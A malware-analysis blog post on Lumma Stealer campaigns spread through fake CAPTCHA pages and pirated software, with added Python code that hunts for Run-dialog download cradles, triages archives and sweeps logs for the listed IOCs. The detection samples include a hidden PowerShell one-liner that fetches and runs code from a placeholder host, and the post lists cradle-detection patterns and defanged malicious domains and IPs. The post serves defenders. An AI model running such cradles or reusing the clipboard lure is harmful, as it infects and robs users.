Notes from the Field • 10 MIN READ
Resurgence in Lumma Stealer Malware Campaigns – Notes from the Field
by Ranjit Patil, Eleanor Barlow • Oct 2024
‘Lumma Stealer’, also known as ‘LummaC2 Stealer’ or simply ‘Lumma’, is an information stealer attributed to Russian-speaking operators and sold as Malware-as-a-Service on dark web forums since 2022. It has been observed against multiple industries and is known for harvesting data from browsers and browser extensions, including two-factor authentication extensions.
‘At SecurityHQ, we have observed Lumma Stealer’s global impact against multiple industries, including IT, media, and manufacturing, where users were compromised by this campaign. Lumma Stealer is known to exfiltrate host details and browser data from the compromised machines, and we have seen some “.shop” domains spreading these malware files.’ - Ranjit Patil, SME-Malware Analysis, SecurityHQ
What SecurityHQ Analysts Observed
SecurityHQ has observed two new campaigns distributing the Lumma Stealer malware, a potent information stealer. Both rely on deceptive tactics, fake CAPTCHA pages on phishing sites and pirated software downloads, to infect victims’ systems and exfiltrate sensitive data.
1. Fake CAPTCHA Pages
The first method uses fake CAPTCHA pages hosted on phishing sites, often fronted by Content Delivery Networks. The page instructs the user to press a sequence of keys, “Windows + R” followed by “CTRL + V” and Enter, which, without the user realising it, pastes and executes a PowerShell command.
The page contains JavaScript that silently copies the PowerShell command to the clipboard; pasting it into the Run dialog and pressing Enter executes it. The command downloads and installs Lumma Stealer onto the victim’s device: the second-stage payload arrives as a ZIP archive, from which the malware is executed, allowing the attacker to steal sensitive information.
Technical Analysis of Fake CAPTCHA Pages
Adversaries host the phishing sites on a variety of platforms, including infrastructure fronted by Content Delivery Networks (CDNs). Each site presents the visitor with a fake CAPTCHA.
The fake CAPTCHA is designed to look like a standard human-verification check, so that the user believes they are proving they are not a bot rather than running a command.
What to Look For
The fake CAPTCHA asks the user to perform a few keystrokes that look harmless in isolation: press “Windows + R”, which opens the Run dialog (a way to launch programs), then “CTRL + V”, then Enter. Because the page has already placed a PowerShell command on the clipboard, following these steps pastes that command into the Run dialog and executes it. A user who works through the prompt quickly, without reading what was pasted, has just launched the installer for Lumma Stealer.
The PowerShell command connects to a remote server, downloads a ZIP archive containing Lumma Stealer, and runs the setup it contains.
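The chain above leaves two cheap artefacts on the endpoint: a process-creation event in which explorer.exe (the parent of anything launched from Win+R) spawns an interpreter carrying a download cradle, and the pasted text itself under HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU. The following hunt logic is an added example written for this page, not SecurityHQ tooling or code from the campaign. The events are constructed in the shape of Sysmon Event ID 1 fields, the RunMRU values in the shape of that key's data, and the domain in them is a placeholder, not one of the IOCs below.

```python
"""Hunt for PowerShell download cradles launched from the Windows Run dialog.

Added example (not SecurityHQ's code). The events below are constructed in the
shape of Sysmon Event ID 1 (process creation) fields, and the RunMRU values in
the shape of HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\RunMRU
data; the domain used is a placeholder.
"""
import re

# Interpreters a pasted Run-dialog command typically lands in.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}

# Tokens that turn a one-liner into a download cradle or hide its execution.
CRADLE_PATTERNS = {
    "web_download": re.compile(
        r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|DownloadFile|curl|wget)\b",
        re.I),
    "inline_exec": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def cradle_indicators(command_line):
    """Names of the cradle patterns present in a command line."""
    return [name for name, rx in CRADLE_PATTERNS.items() if rx.search(command_line)]


def score_process_event(event):
    """Return (severity, reasons) for one process-creation event.

    "high": an interpreter spawned by explorer.exe (how Win+R launches
    programs) carrying a cradle. "medium": a cradle under any other parent.
    None: nothing suspicious.
    """
    if basename(event["Image"]) not in INTERPRETERS:
        return None, []
    reasons = cradle_indicators(event["CommandLine"])
    if not reasons:
        return None, []
    if basename(event["ParentImage"]) == "explorer.exe":
        return "high", ["spawned by explorer.exe (Run dialog)"] + reasons
    return "medium", reasons


def scan_events(events):
    """Flagged events as (severity, CommandLine, reasons), "high" first."""
    flagged = []
    for e in events:
        severity, reasons = score_process_event(e)
        if severity:
            flagged.append((severity, e["CommandLine"], reasons))
    flagged.sort(key=lambda f: f[0] != "high")
    return flagged


def runmru_cradles(values):
    """Flag RunMRU entries. Each value is what was typed or pasted into Win+R,
    stored with a trailing '\\1' marker (the MRUList value gives the order)."""
    flagged = []
    for value in values:
        cmd = value[:-2] if value.endswith("\\1") else value
        hits = cradle_indicators(cmd)
        if hits:
            flagged.append((cmd, hits))
    return flagged


# Constructed sample telemetry (placeholder domain, not a real IOC).
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iex (irm https://verify-captcha.example/p)"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell Get-ChildItem C:\\Users"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -c (New-Object Net.WebClient).DownloadString('https://intranet.example/u.ps1')"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad https://verify-captcha.example"},
]

RUNMRU = [
    "notepad\\1",
    'powershell -w hidden -c "iex (irm https://verify-captcha.example/p)"\\1',
    "cmd\\1",
]

if __name__ == "__main__":
    for severity, cmd, reasons in scan_events(EVENTS):
        print(f"[{severity}] {cmd}\n    {', '.join(reasons)}")
    for cmd, hits in runmru_cradles(RUNMRU):
        print(f"[RunMRU] {cmd}\n    {', '.join(hits)}")
```

Two caveats when running this against real telemetry: command lines are only present if process-creation auditing records them (Sysmon, or Windows 4688 with command-line auditing enabled), and explorer.exe is also the parent of anything a user double-clicks, so the parent alone is not evidence; the cradle tokens carry the weight, and the RunMRU key confirms that the text was pasted into Run rather than launched from a shortcut.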
2. Pirated PC Software Sites
The second campaign leverages pirated PC software sites to spread malicious password-protected ZIP files.
Users are lured into downloading these files, believing they contain free copies of commercial software. Upon extraction and execution of the malicious “Setup.exe”, a Hijack Loader is injected into a Windows binary, initiating the download and execution of Lumma Stealer.
The malware gathers browser login credentials, stored passwords and cookies and sends them to a Command-and-Control (C2) server. It also establishes persistence by creating scheduled tasks and registry entries.
Technical Analysis
Adversaries trick users into downloading malicious password-protected archives advertised as free copies of commercial software. The archives are hosted on file-sharing platforms, and the password is given in the file name, so the user can open the archive while its contents stay opaque to content scanners.
The extracted archive contains multiple Dynamic Link Libraries (DLLs) used for a DLL sideloading attack. Execution begins when the user extracts the ZIP and runs the setup executable.
Upon execution, a malicious loader is injected into a Windows binary. The Hijack Loader then downloads a binary to the Temp folder and executes it; that binary performs credential access and maintains a persistent connection to the C2 server.
Once running, the malware collects host details such as the computer name and language settings.
Next, it reads the internal files of the web browsers installed on the device (Chrome, Edge and others) to collect login data, stored passwords and cookies.
All collected data is sent to the Command-and-Control server.
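The delivery pattern described above (password in the archive name, a setup executable, companion DLLs that exist only to be sideloaded) can be triaged before anything is executed. The check below is an added example written for this page, not SecurityHQ's code, and it does not use any file names from the actual campaign, which the post does not list: the archive names and file listings are constructed, and the set of sideload targets is a hand-picked, non-exhaustive list of system DLLs. The sideloading heuristic rests on Windows' default DLL search order, which looks in the application directory before System32, so a DLL dropped beside Setup.exe with the name of a system DLL (one not protected by the KnownDLLs list) is loaded in place of the genuine one.

```python
"""Triage an extracted "cracked software" archive for the delivery pattern
described in the post: password in the archive name, a setup executable, and
DLLs whose names collide with Windows system DLLs (DLL sideloading candidates).

Added example, not SecurityHQ's code. Archive names and file listings below are
constructed; SIDELOAD_TARGETS is a hand-picked, non-exhaustive list.
"""
import re

# Archive names like "Product_2024_password_1234.zip". The lookbehind stops
# "bypass" from matching; the capture stops at the next separator or dot.
PASSWORD_IN_NAME = re.compile(
    r"(?<![a-z])(?:password|passwd|pass|pw)[\s_\-:=]+([^\s_\-.]+)", re.I)

ARCHIVE_EXT = (".zip", ".rar", ".7z")

# System DLLs that applications import by name and that are NOT on the KnownDLLs
# list, so a same-named DLL in the application directory wins under the default
# DLL search order (application directory before System32).
SIDELOAD_TARGETS = {
    "version.dll", "dbghelp.dll", "wininet.dll", "winhttp.dll", "cryptbase.dll",
    "dwmapi.dll", "uxtheme.dll", "profapi.dll", "propsys.dll", "msimg32.dll",
    "userenv.dll", "iphlpapi.dll", "netapi32.dll", "wtsapi32.dll", "dxgi.dll",
}


def password_from_name(archive_name):
    """The password embedded in an archive name, or None."""
    m = PASSWORD_IN_NAME.search(archive_name)
    return m.group(1) if m else None


def sideload_candidates(files):
    """Files in the listing that collide with a known sideload target name."""
    return sorted(f for f in files if f.lower() in SIDELOAD_TARGETS)


def executables(files):
    """Installers or executables in the listing."""
    return sorted(f for f in files if f.lower().endswith((".exe", ".msi")))


def triage_archive(archive_name, files):
    """Score one archive. Returns the evidence plus a verdict string."""
    findings = {
        "archive": archive_name,
        "password_in_name": password_from_name(archive_name),
        "executables": executables(files),
        "sideload_candidates": sideload_candidates(files),
    }
    score = 0
    if archive_name.lower().endswith(ARCHIVE_EXT) and findings["password_in_name"]:
        score += 2  # encrypted on purpose: defeats content inspection in transit
    if findings["sideload_candidates"]:
        score += 2  # system DLL names shipped next to the installer
    if findings["executables"] and findings["sideload_candidates"]:
        score += 1  # the planted DLL needs a host binary to import it
    if score >= 4:
        findings["verdict"] = "likely_malicious"
    elif score >= 2:
        findings["verdict"] = "suspicious"
    else:
        findings["verdict"] = "no_finding"
    return findings


# Constructed samples: (archive name, names of the extracted files).
SAMPLES = [
    ("Adobe_Photoshop_2024_Full_password_1234.zip",
     ["Setup.exe", "version.dll", "dbghelp.dll", "data.pak", "readme.txt"]),
    ("family_photos_2024.zip", ["IMG_0001.jpg", "IMG_0002.jpg"]),
    ("Office_Pro_Plus_pass-7788.rar", ["Setup.exe", "installer.dll"]),
]

if __name__ == "__main__":
    for name, files in SAMPLES:
        r = triage_archive(name, files)
        print(f"{r['verdict']:17} {name}")
        print(f"    password={r['password_in_name']} exe={r['executables']} "
              f"sideload={r['sideload_candidates']}")
```

A name collision is a strong lead but not proof on its own; the follow-up on a hit is to compare the DLL's Authenticode signature and exports with the genuine file in System32, which is where a sideloaded loader differs from a legitimately redistributed runtime library.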
IP Addresses:
- 184[.]30[.]21[.]171
- 104[.]26[.]2[.]16
- 188[.]114[.]96[.]3
Domains/URLs:
- Predatowpmn[.]shop
- Fileworld[.]shop
- pang-scrooge-carnage[.]shop
- Preachstrwnwjw[.]shop
- Complainnykso[.]shop
Next Steps to Safeguard Against Lumma
- Be cautious of suspicious websites, especially those asking for unusual actions such as keyboard commands; no legitimate CAPTCHA requires opening the Run dialog or pasting text into it.
- Avoid downloading software from untrusted sources, as such downloads often contain hidden malware.
- Monitor the network and endpoints for the Indicators of Compromise (IOCs) listed above.
- Segment Networks: Divide the network into smaller, isolated segments or subnetworks to limit or block lateral movement.
- Deploy EDR: Make sure Endpoint Detection & Response tools have been implemented to detect the latest malware and suspicious activities on endpoints.
- Strengthen Email Security: Implement advanced email filtering and security measures to prevent phishing emails and malicious attachments from reaching your employees’ inboxes.
- Educate Employees: Raise staff awareness about the potential risks associated with opening suspicious emails or documents in general.
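The IOCs above are defanged for safe publication, so the first step in monitoring for them is to refang and normalise them, then match domains as exact or subdomain hits and IPs as exact hits. The sweep below is an added example for this page, not SecurityHQ tooling; the indicator list is the one published above, but the DNS and proxy log lines, internal addresses and timestamps are constructed to exercise the matcher.

```python
"""Refang the IOCs published in the post and sweep DNS/proxy log lines for them.

Added example, not SecurityHQ tooling. IOC_TEXT is the list from the post; the
log lines are constructed (internal hosts, timestamps and unrelated domains are
made up) to exercise the matcher offline.
"""
import re

IOC_TEXT = """
- 184[.]30[.]21[.]171
- 104[.]26[.]2[.]16
- 188[.]114[.]96[.]3
- Predatowpmn[.]shop
- Fileworld[.]shop
- pang-scrooge-carnage[.]shop
- Preachstrwnwjw[.]shop
- Complainnykso[.]shop
"""

IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
HOSTNAME = re.compile(r"\b(?:[a-z0-9-]+\.)+[a-z]{2,}\b")


def refang(indicator):
    """Undo common defanging: [.] and (dot) -> ., hxxp -> http; lower-case."""
    s = indicator.strip()
    s = s.replace("[.]", ".").replace("(.)", ".").replace("(dot)", ".")
    s = re.sub(r"^hxxps?://", lambda m: m.group(0).replace("hxxp", "http"), s, flags=re.I)
    return s.lower()


def load_iocs(text):
    """Split a bulleted IOC list into (ip_set, domain_set)."""
    ips, domains = set(), set()
    for line in text.splitlines():
        line = line.strip().lstrip("-").strip()
        if not line:
            continue
        ioc = refang(line)
        (ips if IPV4.fullmatch(ioc) else domains).add(ioc)
    return ips, domains


def domain_hits(hostname, domains):
    """Exact or subdomain match: cdn.fileworld.shop matches fileworld.shop."""
    return [d for d in domains if hostname == d or hostname.endswith("." + d)]


def sweep(log_text, ips, domains):
    """Return (line_no, kind, indicator, line) for every IOC sighting."""
    hits = []
    for n, line in enumerate(log_text.splitlines(), 1):
        lowered = line.lower()
        for ip in IPV4.findall(lowered):
            if ip in ips:
                hits.append((n, "ip", ip, line))
        for host in sorted(set(HOSTNAME.findall(lowered))):
            for d in domain_hits(host, domains):
                hits.append((n, "domain", d, line))
    return hits


# Constructed log lines in a simple key=value shape (not from a real incident).
LOG = """\
2024-10-01T09:14:02Z dns client=10.20.4.17 qname=pang-scrooge-carnage.shop qtype=A
2024-10-01T09:14:03Z proxy src=10.20.4.17 dst=188.114.96.3:443 host=pang-scrooge-carnage.shop method=POST uri=/api
2024-10-01T09:15:10Z proxy src=10.20.4.17 dst=142.250.74.14:443 host=www.google.com method=GET uri=/
2024-10-01T09:16:45Z dns client=10.20.6.9 qname=cdn.fileworld.shop qtype=A
2024-10-01T09:17:00Z proxy src=10.20.6.9 dst=184.30.21.171:443 host=static.example.net method=GET uri=/js/app.js
"""

if __name__ == "__main__":
    ips, domains = load_iocs(IOC_TEXT)
    for n, kind, ioc, line in sweep(LOG, ips, domains):
        print(f"line {n}: {kind} {ioc}\n    {line}")
```

Weight the two kinds of hit differently. A domain match (including a lookup for a subdomain of a listed domain) is direct evidence of contact with the campaign infrastructure. The post notes that these sites sit behind Content Delivery Networks, and CDN address space is shared with legitimate sites, so an IP-only hit, such as the last constructed line above, needs corroboration from the host header, SNI or DNS logs before it is treated as a compromise.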